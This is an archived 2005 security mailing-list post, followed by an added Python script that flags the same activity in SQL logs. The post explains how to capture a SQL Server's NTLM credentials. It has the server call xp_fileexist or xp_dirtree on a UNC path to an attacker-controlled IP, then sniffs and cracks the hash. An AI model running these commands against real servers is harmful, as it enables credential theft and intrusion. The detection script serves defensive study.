Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[security-alerts] trick for MS SQL Server
> -----Original Message-----
> From: Argeniss [mailto:lists@xxxxxxxxxxxx]
> Sent: Thursday, November 17, 2005 9:23 PM
> To: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] RE: Blind SQL Injection / Stored procedures
>
> I would like to mention a trick for MS SQL Server (this is a Windows
> weakness so it can be exploited on other applications as well) that is
> not well known and it could be really dangerous, it has some limitations,
> i.e.: if SQL Server is behind a firewall blocking connection, etc.
>
> -By default Windows sends NTLM credentials when authenticating to network
> shares.
> -Run Cain tool on your computer
> -Start sniffer.
> -On victim server
> EXECUTE master.dbo.fileexist '\\yourIP\anything'
> or
> EXECUTE master.dbo.dirtree '\\yourIP\anything'
> -Check on Cain SMB captured passwords
> -Send it to cracker.
> -Crack it.
>
> If SQL Server is not running under system account and if the password is
> weak then it can be cracked and then get admin access to SQL Server.
>
> Enjoy.
>
> Cesar.
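
A defender's view of the statements in the message above, as an added example that is not part of the original post: the function scans logged SQL text for the two procedures called with a literal UNC path and reports hosts outside an allowlist. The optional `xp_` prefix (the form SQL Server's extended stored procedures carry), the allowlist values and the sample statements are assumptions constructed for illustration.

```python
import ipaddress
import re

# Matches the procedures named in the message, with or without the xp_ prefix
# (assumption: logs may show either form), called with a literal UNC path.
UNC_CALL = re.compile(
    r"\b(?:xp_)?(fileexist|dirtree)\b\s*\(?\s*N?'\\\\([^\\']+)[\\']",
    re.IGNORECASE,
)

# Hypothetical allowlist: hosts this SQL Server may legitimately reach over SMB.
ALLOWED_NAMES = {"fileserver01"}
ALLOWED_NETS = [ipaddress.ip_network("10.20.0.0/16")]


def host_allowed(host):
    """True when the UNC host is an approved name or inside an approved network."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() in ALLOWED_NAMES
    return any(addr in net for net in ALLOWED_NETS)


def find_unc_callouts(statements):
    """Return (index, procedure, host) for each call whose UNC host is not approved."""
    findings = []
    for i, sql in enumerate(statements):
        for proc, host in UNC_CALL.findall(sql):
            if not host_allowed(host):
                findings.append((i, proc.lower(), host))
    return findings


# Constructed sample statements, as they might appear in a SQL audit trail.
SAMPLE = [
    r"EXECUTE master.dbo.xp_dirtree '\\203.0.113.25\anything'",
    r"exec master..xp_fileexist N'\\fileserver01\backups\db.bak'",
    r"EXECUTE master.dbo.dirtree '\\10.20.0.7\share'",
    "SELECT name FROM sys.databases",
    r"EXECUTE master.dbo.fileexist '\\files.example.net\anything'",
]

if __name__ == "__main__":
    for idx, proc, host in find_unc_callouts(SAMPLE):
        print(f"statement {idx}: {proc} reaches unapproved host {host}")
```

A literal-path match misses paths built in variables, so filtering outbound SMB from the database host, the firewall limitation the message mentions, remains the stronger control.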